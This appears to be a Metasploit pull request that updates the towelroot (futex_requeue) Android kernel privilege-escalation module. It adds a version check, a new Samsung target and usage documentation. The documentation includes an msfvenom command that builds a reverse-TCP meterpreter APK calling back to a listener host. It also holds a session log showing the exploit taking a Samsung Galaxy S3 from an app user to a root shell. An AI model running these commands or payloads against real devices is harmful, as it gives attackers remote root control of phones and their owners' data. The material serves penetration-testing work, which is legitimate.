### PR TITLE
futex updates

### DIFF
--- a/documentation/modules/exploit/android/local/futex_requeue.md
+++ b/documentation/modules/exploit/android/local/futex_requeue.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+
+This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of `futex`.
+It does not trip (set off) Samsung NOX as of the time of writing.
+
+Failed exploitation attempts may reboot the device.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a shell on a vulnerable android device
+  3. Do: ```use exploit/android/local/futex_requeue```
+  4. Select an appropriate target
+  5. Do: ```set lhost [IP]```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Targets
+
+  **0   Automatic Targeting**
+
+  Attempt to automatically determine the target
+
+  **1   Default**
+
+  Nexus 4, 5, 7, etc
+
+  **2   New Samsung**
+
+  Samsung S3, S4, S5, etc
+
+  **3   Old Samsung**
+
+  Samsung Note 2, etc
+
+  **4   Samsung Grand**
+
+  Samsung Grand, etc
+
+## Scenarios
+
+### Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
+
+  The following was used to generate a meterpreter Android application, and it was installed to the device.
+
+  ```
+  msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
+  ```
+
+  ```
+[*] Processing android.128.rb for ERB directives.
+resource (android.128.rb)> use exploit/multi/handler
+resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
+payload => android/meterpreter_reverse_tcp
+resource (android.128.rb)> set lport 9999
+lport => 9999
+resource (android.128.rb)> set lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (android.128.rb)> run
+[*] Started reverse TCP handler on 111.111.1.111:9999 
+[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
+WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+
+meterpreter > sysinfo
+Computer    : localhost
+OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
+Meterpreter : dalvik/android
+meterpreter > getuid
+Server username: u0_a191
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue 
+msf5 exploit(android/local/futex_requeue) > set session 1
+session => 1
+msf5 exploit(android/local/futex_requeue) > set verbose true
+verbose => true
+msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
+lhost => 111.111.1.111
+msf5 exploit(android/local/futex_requeue) > check
+
+[+] Android version 4.4.2 appears to be vulnerable
+[*] The target appears to be vulnerable.
+msf5 exploit(android/local/futex_requeue) > run
+
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[+] Android version 4.4.2 appears to be vulnerable
+[*] Found device: d2vzw
+[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
+[*] Using target: New Samsung
+[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
+[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
+[*] Waiting 300 seconds for payload
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (904600 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+  ```

--- a/modules/exploits/android/local/futex_requeue.rb
+++ b/modules/exploits/android/local/futex_requeue.rb
@@ -38,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Local
           'WfsDelay'     => 300,
           'PAYLOAD'      => 'linux/armle/meterpreter/reverse_tcp',
         },
+        'Notes' => {'AKA' => ['towelroot']},
         'DefaultTarget' => 0,
         'Targets'       => [
           # Automatic targetting via getprop ro.build.model
@@ -53,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local
            }
           ],
 
-          # Samsung devices, S4, S5, etc
+          # Samsung devices, S3, S4, S5, etc
           ['New Samsung',
            {
              'new_samsung'  => true,
@@ -82,12 +83,33 @@ class MetasploitModule < Msf::Exploit::Local
              'force_remove' => true,
            }
           ],
-        ]
+        ],
       }
     ))
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def check
+    os = cmd_exec("getprop ro.build.version.release")
+    unless Gem::Version.new(os) < Gem::Version.new('4.5.0')
+      vprint_error "Android version #{os} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Android version #{os} appears to be vulnerable"
+
+    CheckCode::Appears
   end
 
   def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
     if target['auto']
       product = cmd_exec("getprop ro.build.product")
       fingerprint = cmd_exec("getprop ro.build.fingerprint")
@@ -110,6 +132,7 @@ class MetasploitModule < Msf::Exploit::Local
       elsif [
         "klte",
         "jflte",
+        "d2vzw" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
       ].include? product
         my_target = targets[2] # New Samsung
       elsif [


### PR DESCRIPTION
A few upgrades to the towelroot android exploit.

#12472 

1. Add docs
2. Add AKA of `towelroot`
3. Add `check` command with advanced override the way *nix is now handled
4. Add `d2vzw` to `New Samsung` auto detect list

I want to test my S5 as well to make sure the negative check will work correctly